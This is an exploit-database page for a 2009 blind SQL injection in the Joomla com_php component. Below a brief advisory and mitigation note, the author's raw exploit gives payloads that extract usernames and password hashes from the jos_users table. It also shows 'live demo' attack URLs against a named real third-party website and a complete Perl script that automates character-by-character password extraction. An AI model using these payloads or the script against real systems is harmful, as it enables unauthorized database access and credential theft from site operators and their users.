Joomla Component com_php (id) Blind SQL-injection Vulnerability

vendor:

PHP Component

by:

Chip D3 Bi0s

7,5

CVSS

HIGH

Blind SQL injection

CWE

Product Name: PHP Component

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_php (id) Blind SQL-injection Vulnerability

A Blind SQL injection vulnerability exists in Joomla Component com_php (id) which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is due to improper input validation of the 'id' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands to the vulnerable system. This can result in unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to construct SQL commands that can be executed on the database server.

Source

Exploit-DB raw data:

                       
------------------------------------------------------------------------------
Joomla Component com_php (id) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 # [+] Group         :  LatinHackTeam                #
 #####################################################

**********************************************************************
 Info Cms:
 * @name      : PHP Component
 * @author    : gabe@fijiwebdesign.com
 * @copyright : (c) fijiwebdesign.com
 * @license   : http://www.fijiwebdesign.com/
 * @dowloand : http://code.google.com/p/joomla-php/downloads/list
**********************************************************************

Example:
http://localHost/path/index.php?option=com_php&Itemid=x&id=y<Sql Code>

x = number Itemid valid
y = number id valid

<Sql code>:

table jos_users:
+and+(select+1+from+jos_users+limit+0,1)=1

column password:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1

column username:
+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1

caracter ascii
+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))>57

etc, etc...

DEMO LIVE:

http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=1 
true

http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+1=2
else

http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=58
else

http://www.mercadominas.com.br/index.php?option=com_php&Itemid=70&id=131+and+ascii(substring((SELECT+concat(password)+from+jos_users+limit+0,1),1,1))=57
true

note : in http://www.mercadominas.com.br
x = number Itemid valid    : 70
y = number id valid        : 131

Date and 1=1 & not and 1=2 : com_search --->use script

etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

if you want to save the work, you can use the following script,	
gives you password, you are free to modify it ;)
--------------------------------------------------------------------

#!/usr/bin/perl -w
use LWP::UserAgent;
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t                      |  Chip d3 Bi0s |                       \n\n";
print "\t\t Joomla Component com_php (id) Blind SQL-injection        \n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "[-] http://wwww.host.org/Path: ";
chomp(my $target=<STDIN>);
print "[-] Introduce Itemid: ";
chomp($itemid=<STDIN>);
print "[-] Introduce id: ";
chomp($id=<STDIN>);
print "[-] Dato para and 1=1 & no para and 1=2 : ";
chomp($z=<STDIN>);

print "[+] Password: ";
$column_name="concat(password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');


for ($x=1;$x<=32;$x++)
{            
  for ($c=48;$c<=57;$c++) 
{
 $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;

 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = $z;
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }
for ($c=97;$c<=102;$c++) 
{
 $host = $target . "/index.php?option=com_php&Itemid=".$itemid."&id=".$id."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c;
 my $res = $b->request(HTTP::Request->new(GET=>$host));
 my $content = $res->content;
 my $regexp = $z;
 if ($content =~ /$regexp/) {$char=chr($c); print "$char";}
 }
}

# milw0rm.com [2009-06-29]